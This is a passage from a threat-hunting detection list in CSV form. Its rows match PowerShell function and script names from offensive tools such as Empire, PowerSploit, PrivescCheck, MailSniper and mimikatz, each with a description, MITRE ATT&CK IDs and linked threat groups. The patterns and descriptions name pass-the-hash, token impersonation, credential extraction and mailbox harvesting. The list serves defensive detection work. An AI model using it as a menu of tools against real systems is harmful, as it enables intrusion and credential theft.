T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-StickyNotesExtract*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SystemStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SystemStartupHistoryCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-SystemStartupHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Tater.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Tater.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-TcpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-TheHash*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"*Invoke-TheHash.ps1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"*Invoke-TheHash.psd1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"*Invoke-TheHash.psm1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"*Invoke-TheKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-ThirdPartyDriversCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ThreadedFunction*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Thunderfox*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-TmpDavFS*","offensive_tool_keyword","Invoke-TmpDavFS","Memory Backed Powershell WebDav Server - Creates a memory backed webdav server using powershell that can be mounted as a filesystem. Note: Mounting the remote filesystem on windows implies local caching of accessed files in the C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV system directory.","T1020 - T1059 - T1573 - T1210","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-TmpDavFS","1","0","N/A","N/A","2","132","27","2021-03-07T19:07:39Z","2018-07-01T13:21:11Z" +"*Invoke-TokenManipulation*","offensive_tool_keyword","AD exploitation cheat sheet","Invoke-TokenManipulation script Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-TokenManipulation*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-TokenManipulation.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Tokenvator*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-UacCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-UacCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UdpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UnattendFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-UnattendFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UpdateMimikatzScript.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-UrbanBishop*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invoke-urlcheck -urls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-UserCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserEnvCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserGroupsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserHunter -CheckAccess*","greyware_tool_keyword","powershell","Check local admin access for the current user where the targets are found","T1078.003 - T1046 - T1087.001","TA0002 - TA0007 - TA0040","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*invokeuserhunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-UserHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-UserHunter*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-UserHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*invoke-userhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" +"*Invoke-UserImpersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-UsernameHarvestEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UsernameHarvestGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UsernameHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UserPrivilegesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-UserPrivilegesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserRestrictedSidsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserSessionListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 